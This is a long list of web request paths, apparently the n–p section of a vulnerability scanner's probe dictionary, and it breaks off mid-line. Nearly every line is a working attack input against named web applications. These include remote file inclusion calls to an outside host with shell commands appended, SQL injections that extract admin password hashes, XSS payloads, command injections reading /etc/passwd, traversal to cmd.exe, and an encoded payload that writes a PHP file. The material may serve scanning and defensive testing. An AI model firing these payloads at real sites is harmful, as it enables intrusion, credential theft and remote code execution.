netutils/findata.stm?user=<script>alert(document.cookie)</script>
netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script>
netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>
network.php
network_module_selector.php?path_prefix=http://www.yxlink.com/nvs_test.txt
new/?group_id=&amp;limit=50&amp;offset=50;select 1 as id,CURRENT_USER as forum_id, md5(333) as summary
newThread.php?boardID=+999999%20union%20select%20email,concat_ws(0x3a,nick,substring(password,1,100)),email,email,md5(333)%20from%20user/*
newfile.php
news.php?CONFIG[script_path]=http://www.yxlink.com/nvs_test.txt?
news.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?&cmd=id
news.php?scriptpath=http://www.yxlink.com/nvs_test.txt?
news.php?vwar_root=http://www.yxlink.com/nvs_test.txt
news.php?vwar_root=http://www.yxlink.com/nvs_test.txt?&cmd=ls
news/include/createdb.php?langfile;=http://www.yxlink.com/nvs_test.txt?
news/include/customize.php?l=http://www.yxlink.com/nvs_test.txt?
news/js.php?f_id=1%29%20UNION%20SELECT%201,md5%28333%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23&type=hot
news/js.php?type=like&keyword=123%%2527%29/**/UNION/**/SELECT/**/1,md5(333),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23
news/newstopic_inc.php?indir=http://www.yxlink.com/nvs_test.txt
news/scripts/news_page.php?script_path=http://www.yxlink.com/nvs_test.txt?
newsadmin.php?action=http://www.yxlink.com/nvs_test.txt
newsarchive.php?path_to_script=http://www.yxlink.com/nvs_test.txt?&cmd=ls
newsfeeds/includes/aggregator.php?zf_path=http://www.yxlink.com/nvs_test.txt
newsfeeds/includes/controller.php?zf_path=http://www.yxlink.com/nvs_test.txt
newsletter/newsletter.php?waroot=http://www.yxlink.com/nvs_test.txt
newsp/lib/class.Database.php?path=http://www.yxlink.com/nvs_test.txt?
newthread.php?acuparam=>\x22><ScRiPt>alert(333)</ScRiPt>
newticket.php?lang=http://www.yxlink.com/nvs_test.txt
newtopic.php?subpath=http://www.yxlink.com/nvs_test.txt
nikto.ida
noah/modules/noevents/templates/mfa_theme.php?tpls[1]=http://www.yxlink.com/nvs_test.txt
node/view/666\x5C\x22><script>alert(document.domain)</script>
nosuchurl/><script>alert('Vulnerable')</script>
noticias.php?inc=http://www.yxlink.com/nvs_test.txt?
ns-icons/
nucleus/plugins/skinfiles/index.php?DIR_LIBS=http://www.yxlink.com/nvs_test.txt
nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
nuke_path/iframe.php?file=http://www.yxlink.com/nvs_test.txt
nukebrowser.php?filnavn&filhead=http://www.yxlink.com/nvs_test.txt
nukebrowser.php?filnavn=http://www.yxlink.com/nvs_test.txt&filhead=XXpathXX&cmd=id
nul..cfm
nul..dbm
nul.cfm
nul.dbm
null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
nulllllllllll
nulllllllllll.asp
nulllllllllll.aspx
nulllllllllll.bak
nulllllllllll.bas
nulllllllllll.box
nulllllllllll.btr
nulllllllllll.cfg
nulllllllllll.cfm
nulllllllllll.cgi
nulllllllllll.cnf
nulllllllllll.cobalt
nulllllllllll.conf
nulllllllllll.dat
nulllllllllll.db
nulllllllllll.dll
nulllllllllll.do
nulllllllllll.exe
nulllllllllll.htm
nulllllllllll.html
nulllllllllll.htpasswd
nulllllllllll.htr
nulllllllllll.htw
nulllllllllll.htx
nulllllllllll.ida
nulllllllllll.idc
nulllllllllll.idq
nulllllllllll.inc
nulllllllllll.ini
nulllllllllll.jsp
nulllllllllll.listprint
nulllllllllll.log
nulllllllllll.mdb
nulllllllllll.nsf
nulllllllllll.php
nulllllllllll.pl
nulllllllllll.pm
nulllllllllll.pwd
nulllllllllll.rar
nulllllllllll.snp
nulllllllllll.sql
nulllllllllll.txt
nulllllllllll.vts
nulllllllllll.xml
nulllllllllll.zip
nulllllllllll/
nulllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll.html
nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.yxlink.com/nvs_test.txt
nvs_test.php
nx/common/cds/menu.inc.php?c_path=http://www.yxlink.com/nvs_test.txt
nx/common/dbo/datasets.php?c_path=http://www.yxlink.com/nvs_test.txt
o.php
oaboard_en/forum.php?inc=http://www.yxlink.com/nvs_test.txt
oc/Search/SQLQHit.asp
oc/Search/sqlqhit.asp
ocp-103/index.php?req_path=http://www.yxlink.com/nvs_test.txt
ocs/include/footer.inc.php?fullpath=http://www.yxlink.com/nvs_test.txt?
ocs/include/theme.inc.php?fullpath=http://www.yxlink.com/nvs_test.txt?
ocs/openemr-2.8.2/custom/import_xml.php?srcdir=http://www.yxlink.com/nvs_test.txt?
ocsreports/download.php?n=1&dl=2&o=3&v=4'union+all+select+concat(id,':',md5(333))+from+operators%23
oekaki/
oem_webstage/cgi-bin/oemapp_cgi
oem_webstage/oem.conf
ok.php
olbookmarks-0.7.4/themes/test1.php?http://www.yxlink.com/nvs_test.txt
oneadmin/adminfoot.php?path[docroot]=http://www.yxlink.com/nvs_test.txt
oneadmin/blogger/sampleblogger.php?path[docroot]=http://www.yxlink.com/nvs_test.txt?
oneadmin/config-bak.php?include_once=http://www.yxlink.com/nvs_test.txt
oneadmin/config.php?path[docroot]=http://www.yxlink.com/nvs_test.txt
oneadmin/ecommerce/sampleecommerce.php?path[docroot]=http://www.yxlink.com/nvs_test.txt?
online.php/>\x22><ScRiPt>alert(222)</ScRiPt>
online.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?&cmd=id
open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=http://www.yxlink.com/nvs_test.txt
open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=http://www.yxlink.com/nvs_test.txt?
openautoclassifieds/friendmail.php?listing=&lt;script&gt;alert(document.domain);&lt;/script&gt;
openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>
opendir.php?/etc/passwd
opendir.php?requesturl=/etc/passwd
openi-admin/base/fileloader.php?config[openi_dir]=http://www.yxlink.com/nvs_test.txt
openrat/themes/default/include/html/insert.inc.php?tpl_dir=http://www.yxlink.com/nvs_test.txt???
opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=http://www.yxlink.com/nvs_test.txt
oprocmgr-status
ops/gals.php?news_file=http://www.yxlink.com/nvs_test.txt
options.php?optpage=<script>alert('Vulnerable!')</script>
oracle.php
order.php?action=getarea&level=1%20%20or%20@`\x5C\xE2\x80\x99`=1%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),0x7e,(substring((Select%20concat(md5(3333),0x7e,password)%20from%20`%23@__admin`),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20@`\x5C\xE2\x80\x99`=0%23
order/login.php?svr_rootscript=http://www.yxlink.com/nvs_test.txt
orid/index.php?babInstallPath=http://www.yxlink.com/nvs_test.txt?
orid/ovidentia/approb.php?babInstallPath=http://www.yxlink.com/nvs_test.txt?
orid/ovidentia/options.php?babInstallPath=http://www.yxlink.com/nvs_test.txt?
orid/ovidentia/posts.php?babInstallPath=http://www.yxlink.com/nvs_test.txt?
orid/ovidentia/search.php?babInstallPath=http://www.yxlink.com/nvs_test.txt?
orid/ovidentia/statart.php?babInstallPath=http://www.yxlink.com/nvs_test.txt?
orid/ovidentia/topman.php?babInstallPath=http://www.yxlink.com/nvs_test.txt?
orid/ovidentia/vacadm.php?babInstallPath=http://www.yxlink.com/nvs_test.txt?
orid/ovidentia/vacadma.php?babInstallPath=http://www.yxlink.com/nvs_test.txt?
orid/ovidentia/vacadmb.php?babInstallPath=http://www.yxlink.com/nvs_test.txt?
osData/php121/php121db.php?php121dir=http://www.yxlink.com/nvs_test.txt%00
ossigeno-suite-2.2_pre1/upload/xax/admin/modules/uninstall_module.php?level=http://www.yxlink.com/nvs_test.txt?
ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=http://www.yxlink.com/nvs_test.txt?
otype.asp?classid=1
outImg?domain=..&imgLocation=..&imgName=../accounts/root/postmaster/account.xml
owa/?ae=Folder&t=IPF.Note&id=%3cscript%3ealert(%22HHH%22)%3c/script>
owimg.php3?path=http://www.yxlink.com/nvs_test.txt
owllib/memory/OWLMemoryProperty.php?OWLLIB_ROOT=http://www.yxlink.com/nvs_test.txt
ows-bin/perlidlc.bat?&dir
p-news.php?pn_lang=http://www.yxlink.com/nvs_test.txt
p.php
p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=
p_list.aspx?keyword=%&maxPrice=0&minPrice=0%20And(@@version=0)
packages/vbattach/attach.php?package=http://www.yxlink.com/nvs_test.txt
packages/vbattach/attach.php?path=http://www.yxlink.com/nvs_test.txt
pafiledb.php?\x22><script>alert(333)</script>
pafiledb.php?action=admin&login=do&formname=-99'%20UNION%20SELECT%20admin_id,%20md5(333),%20'6f1ed002ab5595859014ebf0951522d9',%20admin_email,%201%20FROM%20pafiledb_admin%20WHERE%20'1&formpass=blah&B1=%3E%3E+Log+In+%3C%3C&action=admin&login=do
pafiledb.php?action=category&id=1&filelist=%22%3E%3Cscript%3Ealert%28111%29%3C%2Fscript%3E
pafiledb.php?action=category&id=1&pages=%22%3E%3Cscript%3Ealert%28111%29%3C%2Fscript%3E
pafiledb.php?action=viewall&start=20&sortby=name%22%3E%3Cscript%3Ealert%28111%29%3C%2Fscript%3E
pafiledb.php?id=-99'%20UNION%20SELECT%200,md5(333),admin_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+File+%3C%3C&action=team&tm=file&file=edit&edit=form&menu1=%2Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dfile%26file%3Dedit
pafiledb.php?select=-99'%20UNION%20SELECT%200,md5(333),admin_password,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+Category+%3C%3C&action=team&tm=category&category=edit&edit=form&menu1=%2Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dcategory%26category%3Dedit
pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.yxlink.com/nvs_test.txt
page.php?_PHPLIB[libdir]=http://www.yxlink.com/nvs_test.txt
page.php?goto=http://www.yxlink.com/nvs_test.txt
page.php?id=http://www.yxlink.com/nvs_test.txt
pageactionauthor.php?DIR=http://www.yxlink.com/nvs_test.txt
pages.php?id=-2+union+select+1,2,3,md5(333),5,6,7,8+from+information_schema.tables+where+table_schema=database()--
pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
pals-cgi?palsAction=restart&documentName=/etc/passwd
panel/common/theme/default/header_setup.php?path[docroot]=http://www.yxlink.com/nvs_test.txt
param_editor.php?folder=http://www.yxlink.com/nvs_test.txt?
parse/parser.php?WN_BASEDIR=http://www.yxlink.com/nvs_test.txt
passwd/main.php?backend=\x22><script>alert('XSS')</script>&userid=stevejobs&return_to=&oldpassword=foo&newpassword0=foo&newpassword1=foo&submit=Change%20Password
password.inc
password/
patch/?language_id=http://www.yxlink.com/nvs_test.txt
patch/tools/send_reminders.php?noSet=0&includedir=http://www.yxlink.com/nvs_test.txt?
path/nw/article.php?id='
payment.php?act=return&class_name=-1'and%20(select%201%20from%20(select%20count(*),concat(md5(333),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
payment_gateway.php?api[classname]=http://www.yxlink.com/nvs_test.txt
paypalipn/ipnprocess.php?INC=http://www.yxlink.com/nvs_test.txt?
pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
pda/main.php?P=%df%5c%27or%201=1%23
pda/pda_projects.php?offset=http://www.yxlink.com/nvs_test.txt
pdf/
pdfs/
pear/Date/Date.php?PEAR_PATH=http://www.yxlink.com/nvs_test.txt?
pear/Date/Date/Span.php?PEAR_PATH=http://www.yxlink.com/nvs_test.txt?
pear/HTTP_Request/Request.php?PEAR_PATH=http://www.yxlink.com/nvs_test.txt?
pear/Mail/Mail.php?PEAR_PATH=http://www.yxlink.com/nvs_test.txt?
pear/Mail_Mime/mime.php?PEAR_PATH=http://www.yxlink.com/nvs_test.txt?
pear/Mail_Mime/mimeDecode.php?PEAR_PATH=http://www.yxlink.com/nvs_test.txt?
pear/Net_Socket/Socket.php?PEAR_PATH=http://www.yxlink.com/nvs_test.txt?
perl-status
perl/
perl/-e%20%22system('cat%20/etc/passwd');\x5C%22
perl/env.pl
perl/printenv
perl/samples/env.pl
perl/samples/lancgi.pl
perl/samples/ndslogin.pl
perl/samples/volscgi.pl
pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1
phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
phf?Qname=root%0Acat%20/etc/passwd%20
phfito/phfito-post?SRC_PATH=http://www.yxlink.com/nvs_test.txt
phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>
phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>
phorum/admin/stats.php
phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://www.yxlink.com/nvs_test.txt
photo_album/apa_phpinclude.inc.php?apa_module_basedir=http://www.yxlink.com/nvs_test.txt
photo_comment.php?toroot=http://www.yxlink.com/nvs_test.txt
php-coolfile/action.php?action=edit&file=config.php
php-inc/log.inc.php?SKIN_URL=http://www.yxlink.com/nvs_test.txt
php-include-robotsservices.php?page=http://www.yxlink.com/nvs_test.txt
php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
php-ping.php?count=1+%26+id%20-l+%26&submit=Ping%21
php.cgi?/etc/passwd
php.incs/common.inc.php?cm_basedir=http://www.yxlink.com/nvs_test.txt?
php.php
php/gaestebuch/admin/index.php?do=options&action=optionsok&new_username=regularuser&new_password=regularpass&new_rights=admin&user=regularuser&pass=regularpass
php/init.gallery.php?include_class=http://www.yxlink.com/nvs_test.txt/something
php/ip_status.php?ip=;cat%20/etc/passwd
php/mylog.html?screen=/etc/passwd
php/mylog.phtml?screen=/etc/passwd
php/php.exe?c:\x5Cboot.ini
php/php.exe?c:\x5Cwinnt\x5Cboot.ini
php121db.php?php121dir=http://www.yxlink.com/nvs_test.txt%00
php4you.php?dir=http://www.yxlink.com/nvs_test.txt?
phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=http://www.yxlink.com/nvs_test.txt?
phpAdsNew/view.inc.php?phpAds_path=http://www.yxlink.com/nvs_test.txt
phpBB/phpinfo.php
phpBB/viewtopic.php?t=17071&highlight=\x5C\x22>\x5C\x22<script>javascript:alert(document.cookie)</script>
phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>
phpBB2/includes/db.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
phpBB2/search.php?search_id=1\x5C\x5C
phpBB2/shoutbox.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
phpCards.header.php?CardPath=http://www.yxlink.com/nvs_test.txt?
phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.yxlink.com/nvs_test.txt
phpMyAdmin/index.php
phpMyAdmin/scripts/setup.php?>'\x22><script>alert('xss')</script>
phpMyAdmin/sql.php?btnDrop=No&goto=/etc/passwd
phpMyChat.php3?=http://www.yxlink.com/nvs_test.txt?cmd=id
phpMyConferences_8.0.2/common/visiteurs/include/menus.inc.php?lvc_include_dir=http://www.yxlink.com/nvs_test.txt?
phpQLAdmin-2.2.7/ezmlm.php?_SESSION[path]=http://www.yxlink.com/nvs_test.txt?
phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=http://www.yxlink.com/nvs_test.txt
phpbb/sendmsg.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
phpcalendar/includes/calendar.php?phpc_root_path=http://www.yxlink.com/nvs_test.txt?
phpcalendar/includes/setup.php?phpc_root_path=http://www.yxlink.com/nvs_test.txt?
phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script>
phpcms/yp/product.php?pagesize=${@print(md5(NVS_TEST))}
phpdebug_PATH/test/debug_test.php?debugClassLocation=http://www.yxlink.com/nvs_test.txt
phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.yxlink.com/nvs_test.txt
phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.yxlink.com/nvs_test.txt
phphd_downloads/common.php?phphd_real_path=http://www.yxlink.com/nvs_test.txt
phphost_directoryv2/include/admin.php?rd=http://www.yxlink.com/nvs_test.txt?
phphtml.php?htmlclass_path=http://www.yxlink.com/nvs_test.txt
phpi/edit_top_feature.php?include_connection=http://www.yxlink.com/nvs_test.txt
phpi/edit_topics_feature.php?include_connection=http://www.yxlink.com/nvs_test.txt
phpimageview.php?pic=javascript:alert('Vulnerable')
phpinfo.php
phpinfo.php3
phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script>
phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>
phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>
phpinfo.php?cx[]=JUNK(4096)<script>alert(111)</script>
phpinfo.php?cx[]=JUNK(4096)<script>alert(foo)</script>
phpinj.php
phplib/site_conf.php?ordnertiefe=http://www.yxlink.com/nvs_test.txt
phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=http://www.yxlink.com/nvs_test.txt
phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=http://www.yxlink.com/nvs_test.txt
phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=http://www.yxlink.com/nvs_test.txt
phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=http://www.yxlink.com/nvs_test.txt
phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=http://www.yxlink.com/nvs_test.txt
phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=http://www.yxlink.com/nvs_test.txt
phplib/version/1.3.3/module/referenz.php?tt_docroot=http://www.yxlink.com/nvs_test.txt
phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=http://www.yxlink.com/nvs_test.txt
phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=http://www.yxlink.com/nvs_test.txt
phplib/version/1.3.3/standard/1/lay.php?tt_docroot=http://www.yxlink.com/nvs_test.txt
phplib/version/1.3.3/standard/3/lay.php?tt_docroot=http://www.yxlink.com/nvs_test.txt
phplinks/includes/smarty.php?full_path_to_public_program=http://www.yxlink.com/nvs_test.txt
phpliteadmin.php?action=row_view&table=\xE2\x80\x98
phpmm.php
phpmyadmin/index.php
phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
phporacleview/inc/include_all.inc.php?page_dir=http://www.yxlink.com/nvs_test.txt
phppc/poll.php?is_phppc_included=1&relativer_pfad=http://www.yxlink.com/nvs_test.txt?
phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=http://www.yxlink.com/nvs_test.txt?
phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=http://www.yxlink.com/nvs_test.txt?
phpping/index.php?pingto=www.test.com%20|%20dir%20c:\x5C\x5C
phpquickgallery/gallery_top.inc.php?textFile=http://www.yxlink.com/nvs_test.txt
phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E
phpreactor/inc/polls.inc.php?pathtohomedir=http://www.yxlink.com/nvs_test.txt?
phpreactor/inc/updatecms.inc.php?pathtohomedir=http://www.yxlink.com/nvs_test.txt?
phpreactor/inc/users.inc.php?pathtohomedir=http://www.yxlink.com/nvs_test.txt?
phpreactor/inc/view.inc.php?pathtohomedir=http://www.yxlink.com/nvs_test.txt?
phpress/adisplay.php?lang=http://www.yxlink.com/nvs_test.txt
phprint.php?module=--><script>alert(/xss/)</script>&action=index&parenttab=My%20Home%20Page&jt=
phpspy.php
phpsso_server/api.php?op=uc
phptonuke.php?filnavn=/etc/passwd
phptonuke.php?filnavn=<script>alert('Vulnerable')</script>
phpunity-postcard.php?plgallery_epost=1&gallery_path=http://www.yxlink.com/nvs_test.txt?
phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.yxlink.com/nvs_test.txt
phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://www.yxlink.com/nvs_test.txt
phpwebchat/register.php?register=yes&username=OverG&email=<script>alert%20(\x5C\x22Vulnerable\x5C\x22)</script>&email1=<script>alert%20(\x5C\x22Vulnerable\x5C\x22)</script>
phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\x5C\x22><script>alert('Vulnerable')</script>
phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=
phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\x5C\x22><script>alert('Vulnerable')</script>
phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\x5C\x22><script>alert('Vulnerable')</script>&MMN_position=[X:X]
phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\x5C\x22><script>alert('Vulnerable')</script>
phpyabs/moduli/libri/index.php?Azione=http://www.yxlink.com/nvs_test.txt
pic.php
pic.php?url=MWpwZy8uLi9jb3JlL2NvbmZpZy5jb25uLnBocA==&type=jpg
pirvate/ltwpdfmonth.php?ltw_config['include_dir]=http://www.yxlink.com/nvs_test.txt
piw/Production/display/productSearch.jsp?keywords=1%27)/**/AND/**/(select/**/2301/**/from(select/**/count(*),concat(0x7c,(mid((ifnull(cast(current_user()/**/as/**/char),0x20)),1,50)),0x7c,md5(1),0x7c,floor(rand(0)*2))x/**/from/**/information_schema.character_sets/**/group/**/by/**/x)a)/**/and/**/(%27a%27=%27a)
planetGalleryPath/images/1/evil.png.php
playlist.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
pls/admin
pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script>
pls/help/<script>alert('Vulnerable')</script>
pls/ldc/admin_/
pls/portal30/admin_/
pls/sample/admin_/help/..%255cplsql.conf
pls/simpledad/admin_/
pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E
pls/simpledad/admin_/dadentries.htm
pls/simpledad/admin_/gateway.htm?schema=sample
pls/simpledad/admin_/globalsettings.htm
plug/productbuy.asp?id=-2+union+select+1,2,888888-1,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User
plugin/HP_DEV/cms2.php?s_dir=http://www.yxlink.com/nvs_test.txt
plugin/gateway/gnokii/init.php?apps_path[plug]=http://www.yxlink.com/nvs_test.txt?
plugins/
plugins/1_Adressbuch/delete.php?folder=http://www.yxlink.com/nvs_test.txt
plugins/BackUp/Archive.php?bkpwp_plugin_path=http://www.yxlink.com/nvs_test.txt?
plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=http://www.yxlink.com/nvs_test.txt?
plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=http://www.yxlink.com/nvs_test.txt?
plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=http://www.yxlink.com/nvs_test.txt?
plugins/jbshop/jbshop.php?item_details=1&item_id=-1 union all select group_concat(md5(333),0x3a,user_password,0x3a,user_admin),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM e107_user--
plugins/links/functions.inc?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/polls/functions.inc?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/rss_importer_functions.php?sitepath=http://www.yxlink.com/nvs_test.txt?
plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.yxlink.com/nvs_test.txt?
plugins/safehtml/safehtml.php?dir[plugins]=http://www.yxlink.com/nvs_test.txt?
plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/spamx/EditIP.Admin.class.php?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/spamx/Import.Admin.class.php?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/spamx/LogView.Admin.class.php?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/staticpages/functions.inc?_CONF[path]=http://www.yxlink.com/nvs_test.txt
plugins/vkeyboard/vkeyboard.php?passformname=%22%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E%3Cscript%3E/*%20
plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=http://www.yxlink.com/nvs_test.txt
plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls&_PX_config[manager_path]=http://www.yxlink.com/nvs_test.txt
plus.php?_pages_dir=http://www.yxlink.com/nvs_test.txt?
plus/Ajaxs.asp?action=GetRelativeItem&Key=%25
plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527NVS_TEST%2527%252Bpassword%20from%20KS_Admin%2500
plus/advancedsearch.php?mid=1&sql=SELECT
plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash,md5(333)%29,3+from+qs_admin%23
plus/ajax_officebuilding.php?act=alphabet&x=11%d5'%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,concat(0x4E56535F544553542D2D,admin_name,0x3A,pwd,0x2D2D4E56535F54455354),9%20from%20qs_admin%23
plus/ajax_street.php?act=alphabet&x=11%d5'%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,concat(0x4E56535F544553542D2D,admin_name,0x3A,pwd,0x2D2D4E56535F54455354),9%20from%20qs_admin%23
plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,user(),5,6,7,md5(333),9%23
plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=52&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=110&arrs2[]=118&arrs2[]=115&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=109&arrs2[]=100&arrs2